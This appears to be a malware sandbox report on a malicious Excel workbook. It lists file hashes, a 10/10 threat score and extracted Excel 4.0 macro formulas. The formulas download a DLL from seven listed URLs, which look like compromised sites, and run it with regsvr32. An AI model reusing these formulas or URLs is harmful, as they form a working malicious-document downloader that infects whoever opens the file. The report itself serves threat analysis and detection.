General

  • Target

    c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e

  • Size

    46KB

  • MD5

    becb7a238516b57164e3aa3eefdcecbf

  • SHA1

    aabdfc17de5e1b94a2f2c523f3e7122897bb2fee

  • SHA256

    c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e

  • SHA512

    cdc8fd1eb39d47d19e0ce86f0c074f73f100ad2639e21579aae1ecb2108bd6def16bf850eb5b55a5017b37c9e1071061b3ea975065512b6260c91d415f0c2f98

  • SSDEEP

    768:mCra70og13bQiBpFViBYYg8z/cZ2IQYRAvYUbTUPMr7nIIbwPvvfOa6rw7M39vdY:zraQog5bz3iBC8z/XYCpK60Ibwv3OHsL

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arkpp.com/ARIS-BSU/9K1/","..\fbd.dll",0,0)
    =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/","..\fbd.dll",0,0))
    =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.babylinesl.com/catalog/iVsl6YvlyIyX/","..\fbd.dll",0,0))
    =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/","..\fbd.dll",0,0))
    =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://unada.us/acme-challenge/3NXwcYNCa/","..\fbd.dll",0,0))
    =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://automobile-facile.fr/wp-admin/QV/","..\fbd.dll",0,0))
    =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alebit.de/css/gqKtdKmTsC4iDh/","..\fbd.dll",0,0))
    =IF('EGVEB'!D21<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll")
    =RETURN()

Signatures

Files

  • c05fc0a3bc5d6f17aa4993862d18fefc210b6c6e46ea07e6f2645e5056e50c2e
    .xlsx office2007